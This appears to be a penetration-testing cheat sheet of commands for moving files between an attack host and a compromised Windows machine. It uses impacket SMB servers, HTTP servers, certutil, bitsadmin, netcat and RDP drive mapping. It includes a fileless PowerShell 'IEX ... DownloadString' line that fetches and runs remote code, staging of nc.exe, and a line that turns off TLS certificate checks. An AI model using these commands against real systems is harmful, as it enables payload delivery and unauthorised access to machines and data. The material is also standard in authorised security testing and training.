CONNECTING TO AN SMB SHARE USING POWERSHELL¶
- Set Up an SMB Server with Credentials
sudo impacket-smbserver hackfast $(pwd) -smb2support -user hackfast -password hackfast - Convert Password to Secure String
$pass = convertto-securestring 'hackfast' -AsPlainText -Force - Create Credential Object
$cred = New-Object System.Management.Automation.PSCredential('hackfast',$pass) - Map the Network Drive
New-PSDrive -Name hackfast -PSProvider FileSystem -Credential $cred -Root \\[IP-ADDRESS]\hackfast - Navigate to the Mapped Drive
cd hackfast:
DOWNLOADING FILES VIA SMB (NO CREDENTIALS)¶
- Set Up an SMB Server
sudo impacket-smbserver share -smb2support . - Download a File from SMB Server:
copy \\[IP-ADRESS]\share\file.txt .
DOWNLOADING FILES VIA SMB (WITH CREDENTIALS)¶
- Configure SMB Server Using impacket-smbserver
sudo impacket-smbserver hackfast $(pwd) -smb2support -user hackfast -password hackfast - Configure SMB Server Using smbserver.py
smbserver.py hackfast . -smb2support -username hackfast -password hackfast - Map a Network Drive
net use z: \\[IP-ADRESS]\hackfast /user:hackfast hackfast - Copy a File from the Mapped Drive
copy z:\file.txt .
DOWNLOADING FILES VIA FTP¶
- Start an FTP Server:
sudo python3 -m pyftpdlib --port 21 - Downloading a File Using PowerShell
(New-Object Net.WebClient).DownloadFile('ftp://[IP-ADDRESS]/file.txt', 'C:\Users\Public\file.txt') -
Automate FTP Downloads with Command File:
SETTING UP AN HTTP SERVER AND DOWNLOADING FILES USING PYTHON 2¶
-
Start a HTTP server:
python -m SimpleHTTPServer 8000 -
Download File Using PowerShell :
powershell iwr -uri http://[IP-ADDRESS]:8000/file.txt -outfile file.txt -
Download File Using certutil
certutil -urlcache -f http://[IP-ADDRESS]:8000/file.txt file.txt -
Download File Using bitsadmin
bitsadmin /transfer debjob /download /priority normal http://[IP-ADDRESS]:8000/file.txt C:\Users\\Public\file.txt
SETTING UP AN HTTP SERVER AND DOWNLOADING FILES USING PYTHON 3¶
-
Start a HTTP server:
python3 -m http.server 8000 -
Download File Using PowerShell :
powershell iwr -uri http://[IP-ADDRESS]:8000/file.txt -outfile file.txt -
Download File Using certutil
certutil -urlcache -f http://[IP-ADDRESS]:8000/file.txt file.txt -
Download File Using bitsadmin
bitsadmin /transfer debjob /download /priority normal http://[IP-ADDRESS]:8000/file.txt C:\Users\\Public\file.txt
SETTING UP HTTP SERVER AND FILE DOWNLOAD USING PHP¶
-
Start a HTTP server:
php -S 0.0.0.0:8000 -
Download File Using PowerShell :
powershell iwr -uri http://[IP-ADDRESS]:8000/file.txt -outfile file.txt -
Download File Using certutil
certutil -urlcache -f http://[IP-ADDRESS]:8000/file.txt file.txt -
Download File Using bitsadmin
bitsadmin /transfer debjob /download /priority normal http://[IP-ADDRESS]:8000/file.txt C:\Users\Public\file.txt
SETTING UP HTTP SERVER AND FILE DOWNLOAD USING RUBY¶
-
Start a HTTP Server:
ruby -run -e httpd . -p 8000 -
Download File Using PowerShell :
powershell iwr -uri http://[IP-ADDRESS]:8000/file.txt -outfile file.txt -
Download File Using certutil
certutil -urlcache -f http://[IP-ADDRESS]:8000/file.txt file.txt -
Download File Using bitsadmin
bitsadmin /transfer debjob /download /priority normal http://[IP-ADDRESS]:8000/file.txt C:\Users\\Public\file.txt
SETTING UP AN APACHE SERVER AND FILE DOWNLOAD¶
- Place File into the Apache Web Directory:
cp nc.exe /var/www/html - Start the Apache Server:
sudo systemctl start apache2 - Downloading a File via Web Browser or PowerShell
Invoke-WebRequest -Uri http://[IP-ADDRESS]/file.txt -OutFile file.txt
ENCODING AND DECODING FILE WITH BASE64¶
- Generate MD5 checksum:
md5sum file.txt - Encoding File Content to Base64
cat file.txt | base64 -w 0; echo - Decoding Base64 Content on Windows
[IO.File]::WriteAllBytes("C:\Temp\file.txt", [Convert]::FromBase64String("[BASE64-STRING]")) - Verify the MD5 checksum of the decoded file:
Get-FileHash C:\Temp\file.txt -Algorithm MD5
DOWNLOADING FILES FROM A REMOTE SESSION¶
- Create a PowerShell Remoting session:
$Session = New-PSSession -ComputerName DATABASE01 - Copy the file from the remote session to your local machine:
Copy-Item -Path "C:\Users\Administrator\Desktop\file.txt" -Destination C:\ -FromSession $Session
FILE TRANSFERS WITH NETCAT AND NCAT¶
- Downloading a File (Receiving)
- Using Netcat On the Compromised Machine (Listening):
nc -l -p 8000 > received_file.exe
- Using Netcat On the Compromised Machine (Listening):
- On the Attack Host (Sending):
- Using Netcat
nc -q 0 [IP_ADRESS] 8000 < file.exe - Using Ncat
ncat --send-only [IP_ADRESS] 8000 < file.exe
- Using Netcat
DOWNLOADING FILES VIA RDP (LINUX TO WINDOWS)¶
- Using rdesktop for File Transfer
rdesktop [IP-ADRESS] -d [DOMAIN] -u [USERNAME] -p '[PASSWORD]' -r disk:linux='/home/user/rdesktop/files' - Using xfreerdp for File Transfer
xfreerdp /v:[IP-ADRESS] /d:[DOMAIN] /u:[USERNAME] /p:'[PASSWORD]' /drive:[NAME],[PATH] - Accessing Mounted Directory in RDP Session
Connect to\\tsclient\within the RDP session to transfer files to and from the mounted directory.
POWERSHELL WEB DOWNLOADS¶
-
Downloading Files Using DownloadFile Method
(New-Object Net.WebClient).DownloadFile('http://[IP-ADRESS]:8000/file.ps1','C:\Temp\file.ps1') -
Using DownloadFileAsync for Non-Blocking Downloads
(New-Object Net.WebClient).DownloadFileAsync('http://[IP-ADRESS]:8000/file.ps1', 'C:\Temp\file.ps1') -
Executing Fileless Downloads Using DownloadString
IEX (New-Object Net.WebClient).DownloadString('http://[IP-ADRESS]:8000/file.ps1') -
Downloading File Using Invoke-WebRequest
Invoke-WebRequest http://[IP-ADRESS]:8000/file.ps1 -OutFile C:\Temp\file.ps1 -
Bypassing Internet Explorer Configuration
Invoke-WebRequest http://[IP-ADRESS]:8000/file.ps1 -UseBasicParsing -
Bypassing SSL/TLS Secure Channel Issues:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}